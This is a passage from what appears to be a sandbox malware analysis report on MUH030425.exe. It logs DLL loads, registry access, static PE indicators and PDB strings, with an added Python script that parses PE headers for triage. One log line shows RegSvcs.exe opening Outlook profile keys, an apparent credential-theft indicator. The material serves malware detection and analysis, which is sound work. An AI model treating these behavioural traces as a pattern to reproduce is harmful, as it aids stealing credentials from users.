              Source: C:\Windows\System32\msdtc.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\Locator.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.perception.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mediafoundation.defaultperceptionprovider.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: structuredquery.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: windows.globalization.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: bcp47mrm.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: icu.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: mswb7.dll
              Source: C:\Windows\System32\SensorDataService.exeSection loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: perceptionsimulationextensions.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: hid.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: holographicruntimes.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: perceptiondevice.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: spatialstore.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: esent.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: analogcommonproxystub.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: windows.devices.enumeration.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: structuredquery.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: windows.globalization.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: bcp47mrm.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: icu.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: mswb7.dll
              Source: C:\Windows\System32\Spectrum.exe | Section loaded: devdispitemprovider.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: apphelp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: libcrypto.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: esent.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: clusapi.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\TieringEngineService.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: fltlib.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: version.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: activeds.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: adsldpc.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\AgentService.exe | Section loaded: appmanagementconfiguration.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: osuninst.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: vdsutil.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: bcd.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: uexfat.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: ulib.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: ifsutil.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: devobj.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: uudf.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: untfs.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: ufat.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: fmifs.dll
              Source: C:\Windows\System32\vds.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: vssapi.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: virtdisk.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: bcd.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: spp.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: netapi32.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: xmllite.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: clusapi.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: wer.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: vsstrace.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: fltlib.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbengine.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\MUH030425.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\MUH030425.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: MUH030425.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MUH030425.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: MUH030425.exe | Static file information: File size 1656320 > 1048576
              Source: MUH030425.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x18be00
              Source: MUH030425.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: MUH030425.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
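              The static PE facts the report lists for MUH030425.exe (CLR header, .text larger than 0x100000, DllCharacteristics flags, debug directory, file size) and the out-of-range compile timestamp 0xF67E8745 it flags for the dropped alg.exe under Data Obfuscation can all be re-derived from the headers without a sandbox. The script below is an added example, not part of the Joe Sandbox report and not code from the sample; it parses the DOS, COFF, optional and section headers with the Python standard library only and prints the same indicators. The build_sample_pe helper and the SAMPLE it produces are constructed test input that mirrors the report's numbers, not bytes taken from MUH030425.exe or alg.exe.

```python
"""Static PE triage reproducing the "Static PE information" checks in the report: CLR header,
debug directory, DllCharacteristics, section names and sizes, file size, future compile timestamp."""
import struct
import time

DIR_DEBUG, DIR_COM_DESCRIPTOR = 6, 14   # IMAGE_DIRECTORY_ENTRY_* indices
SIZE_LIMIT = 0x100000                   # section size threshold used in the report
FILE_SIZE_LIMIT = 1048576               # file size threshold used in the report
DLL_CHARACTERISTICS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
                       0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE"}
# Names a stock MSVC/.NET toolchain emits; anything else is reported for the analyst to judge.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc", ".idata", ".edata", ".tls", ".bss", ".CRT"}


def parse_pe(data):
    """Parse DOS, COFF and optional headers plus the section table; ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    _, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                  # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    layout = {0x10B: (92, 96), 0x20B: (108, 112)}.get(magic)   # (NumberOfRvaAndSizes, DataDirectory) offsets
    if layout is None:                                   # PE32 vs PE32+: 8-byte stack/heap fields shift both by 16
        raise ValueError("unknown optional header magic 0x%X" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    nrva = struct.unpack_from("<I", data, opt + layout[0])[0]
    dirs = [struct.unpack_from("<II", data, opt + layout[1] + 8 * i) for i in range(min(nrva, 16))]
    dirs += [(0, 0)] * (16 - len(dirs))
    sections = []
    for i in range(nsec):                                # Name, VirtualSize, VirtualAddress, SizeOfRawData
        name, vsize, _, rawsize = struct.unpack_from("<8sIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rawsize))
    return {"timestamp": timestamp, "dll_characteristics": dll_chars, "data_directories": dirs,
            "sections": sections, "file_size": len(data)}


def triage(data, now=None):
    """Return the indicators as a dict, with report-style strings under "findings"."""
    pe = parse_pe(data)
    now = time.time() if now is None else now
    clr = pe["data_directories"][DIR_COM_DESCRIPTOR] != (0, 0)
    dbg = pe["data_directories"][DIR_DEBUG] != (0, 0)
    flags = [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if pe["dll_characteristics"] & bit]
    findings = ["DllCharacteristics: " + ", ".join(flags)]
    if clr:
        findings.append("data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (managed .NET image)")
    if dbg:
        findings.append("data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG")
    if pe["file_size"] > FILE_SIZE_LIMIT:
        findings.append("File size %d > %d" % (pe["file_size"], FILE_SIZE_LIMIT))
    unusual = [name for name, _, _ in pe["sections"] if name not in COMMON_SECTIONS]
    findings += ["section name: " + name for name in unusual]
    for name, vsize, rawsize in pe["sections"]:
        if vsize > SIZE_LIMIT:
            findings.append("Virtual size of %s is bigger than: 0x%X < 0x%X" % (name, SIZE_LIMIT, vsize))
        if rawsize > SIZE_LIMIT:
            findings.append("Raw size of %s is bigger than: 0x%X < 0x%X" % (name, SIZE_LIMIT, rawsize))
    ts = pe["timestamp"]
    ts_text = time.strftime("%a %b %d %H:%M:%S %Y UTC", time.gmtime(ts))
    future = ts > now + 86400                            # more than a day ahead of the clock we were given
    if ts == 0:
        findings.append("compile timestamp zeroed")
    elif future:
        findings.append("compile timestamp in the future: 0x%08X [%s]" % (ts, ts_text))
    return {"clr_header": clr, "debug_directory": dbg, "dll_flags": flags, "timestamp": ts,
            "timestamp_text": ts_text, "timestamp_future": future, "unusual_sections": unusual,
            "findings": findings}


def build_sample_pe(timestamp, sections, dll_characteristics):
    """Constructed PE32 header-only image for offline testing (not bytes from any real sample)."""
    opt = bytearray(96 + 16 * 8)                         # PE32 optional header with 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)                # Magic = PE32
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                  # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * DIR_DEBUG, 0x2000, 0x1C)            # non-empty debug directory
    struct.pack_into("<II", opt, 96 + 8 * DIR_COM_DESCRIPTOR, 0x2008, 0x48)   # non-empty CLR header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, len(opt), 0x0102)
    table = b"".join(struct.pack("<8sIIIIIIHHI", name.encode("ascii"), vsize, 0x1000 * (i + 1), rawsize,
                                 0x400, 0, 0, 0, 0, 0x60000020)
                     for i, (name, vsize, rawsize) in enumerate(sections))
    dos = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    return dos + b"PE\0\0" + coff + bytes(opt) + table


# Constructed sample mirroring the report: .text raw size 0x18BE00, the flag set
# HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE (0x8560), timestamp 0xF67E8745.
SAMPLE = build_sample_pe(0xF67E8745, [(".text", 0x18BD50, 0x18BE00), (".didat", 0x200, 0x200)], 0x8560)
```

              Run it on a real file with triage(open(path, "rb").read())["findings"]. The timestamp check compares against the clock passed in (now), so a triage run can be pinned to the sample's collection time; a link timestamp decades ahead, as with the 2101 value on this page, means the field was overwritten rather than set by the linker, which is why the report files it under Data Obfuscation.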
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000000D.00000003.1687730891.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.13.dr
              Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000000D.00000003.1873376292.0000000001650000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1876347240.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: PresentationFontCache.pdb source: alg.exe, 0000000D.00000003.1602398119.00000000016C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdbOGP source: setup.exe1.13.dr
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: plugin-container.pdb source: alg.exe, 0000000D.00000003.2202633741.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000000D.00000003.1637621243.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.8.dr
              Source: Binary string: d:\dbs\el\omr\target\x86\ship\dcf\x-none\Common.ShowHelp.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: Common.ShowHelp.exe.13.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: vcruntime140.i386.pdbGCTL source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: pingsender.pdb source: alg.exe, 0000000D.00000003.2182345698.0000000000650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER4A31.tmp.dmp.18.dr
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000000D.00000003.2131240760.0000000000440000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\setup.exe.pdb source: setup.exe1.13.dr
              Source: Binary string: firefox.pdb source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000000D.00000003.1863510269.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: firefox.pdbP source: alg.exe, 0000000D.00000003.2112410522.0000000000430000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000000D.00000003.1724231457.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 0000000D.00000003.1742573812.0000000001650000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: alg.exe, 0000000D.00000003.1947973037.0000000001480000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000000D.00000003.1812452407.0000000001450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1806949825.0000000001660000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: RegSvcs.exe, 00000008.00000002.1607219329.0000000004A60000.00000004.00001000.00020000.00000000.sdmp
